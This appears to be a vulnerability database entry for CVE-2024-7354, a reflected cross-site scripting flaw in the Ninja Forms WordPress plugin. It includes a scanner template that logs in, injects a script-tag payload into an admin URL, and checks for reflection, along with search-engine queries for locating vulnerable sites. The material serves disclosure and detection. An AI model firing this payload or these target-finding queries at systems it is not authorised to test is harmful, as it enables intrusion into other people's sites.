CVE-2024-7354: Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting

2025-08-01 Ninja_forms PoC Public

Description

The Ninja Forms WordPress plugin before 3.8.11 does not escape an URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

PoC

id: CVE-2024-7354

info:
  name: Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The Ninja Forms WordPress plugin before 3.8.11 does not escape an URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
  impact: |
    Attackers can potentially exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Update the plugin to Latest version. Fixed in 3.8.11.
  reference:
    - https://wpscan.com/vulnerability/3c871dcd-51d7-4d3b-b036-efa9e066ff41/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7354
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-7354
    cwe-id: CWE-79
    epss-score: 0.00702
    epss-percentile: 0.51545
    cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: ninjaforms
    product: ninja_forms
    framework: wordpress
    fofa-query: body="/wp-content/plugins/ninja-forms"
    publicwww-query: /wp-content/plugins/ninja-forms/
    shodan-query: http.html:"/wp-content/plugins/ninja-forms/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,ninja-forms,xss,authenticated,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/ninja-forms"
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=nf-submissions&"><script>alert(document.domain)</script>=2 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: content_type_2
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402206f3be40d1a4e2c390cc0073cd30bf6fdfd4a7df3453fb1540409de7775f20f920220702379bf692f34cc30607a52abb3da6ad95d76d8b9b8f64709e04a3f52130907:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities